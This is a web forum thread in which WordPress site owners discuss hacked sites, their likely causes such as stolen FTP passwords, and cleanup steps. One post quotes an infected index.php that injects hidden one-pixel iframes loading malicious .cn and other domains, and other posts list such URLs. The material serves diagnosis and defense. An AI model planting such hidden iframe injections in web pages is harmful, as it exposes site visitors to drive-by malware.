To guarantee that you won’t get hacked always use the latest version of wordpress, only use plugins, scripts and themes which you trust and use a secure password for your wordpress admin, your database and your ftp. Just out of interest, what is the url for your site?
I had the same thing. I am using wp 2.5.1 on the site. When upgrading to 2.7.1 ran into problems on another site so didn’t yet upgrade yet.
In fact the one with 2.7.1 has been hacked too. I can’t even get back into the back-end at the moment.
Could you post a link to that hacked site.
Be aware joeyconnick that you could possibly have a rootkit installed on your system.
I’ve recently had issues with sites that I develop, albeit .Net sites, also hacked and injected with same/similar iframe code. An example below…
betbigwager.cn/in.cgi?income61
lotultimatebet.cn/in.cgi?income60
I believe that my system was compromised with a rootkit, and access details to the sites I manage were retrieved for the express interest of further propogating the rootkit. I say this becuase AVG picked up the presence of rootkit activity after I viewed an infected page.
In regards to how I was compromised… I was not surfing inappropriate material, nor executing unkown files… I think it’s probably a firefox exploit… more than likely on a add-on. Good Luck.
Thanks for the info, bsains. I doubt it’s a rootkit on my system but it might be one on the system of my friend whose blog it is. She’s the one who usually interacts with it.
We were also advised it might have been a brute-force attack against her ftp password.
Yeah, the injected iframe stuff for us was the lotultimatebet site.
I’ll see if her anti-virus software has rootkit detection.
Hi,
This is not a WordPress exploit. Most likely FTP password is compromised.
I’ve just covered this particular exploit in my blog.
http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
- Scan local computers for viruses and spyware
- Change FTP passwords
- Upload clean content from a backup
euh,don’t know. how do you know when your wp is hacked?
Thanks all for your answers. I’ve changed passwords, uploaded clean content, etc and am going through other steps to avoid wasting a day of my life again.
Tomontoast to answer your q:
1. http://www.naturopathy-uk.com
2. http://www.naturopathy.ie
3. http://www.cnmstudent.com
Here is what appears in my index.php file
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./blog/wp-blog-
header.php');
echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
<iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>
What should I do now… All my blogs have been similarly hacked, even non-wordpress domains
The income .cn iframes are not even PHP-related. They are added at the bottom of files like index.html, index.php, etc.
The xtrarobotz/nipkelo/internetcountercheck hack is more sophisticated – it injects PHP-code. I didn’t investigate it, but since they usually appear on the same sites as the income .cn iframes, I assume the same compromised passwords are used.
We got hacked when we installed this WordPress plug-in: Make Tabbloid. We believe it takes advantage of the PDF creation tool and therefore allowed the hacker to gain acccess.
2784876
does any one have any plugin which automatically sends alert to the owners email address if some one try wrong password on our blog or have other kind of instant notification. That would be also helpful what do you guys think?
My website was also hacked this week and I’ve been spending the last two days fixing it. I think I finally got is resolved. They injected links into alot of the theme files and then iframe injections into some posts. It was really weird. I removed the admin user, changed the passwords, and added alot of plugins that were suggested in this blog: http://www.aboutonlinetips.com/wordpress-security-plugins/
@saaqi If you wanted a plugin to help with securing your log in, Stealth Login, Login LockDown, and Chap Secure Login are your best options.
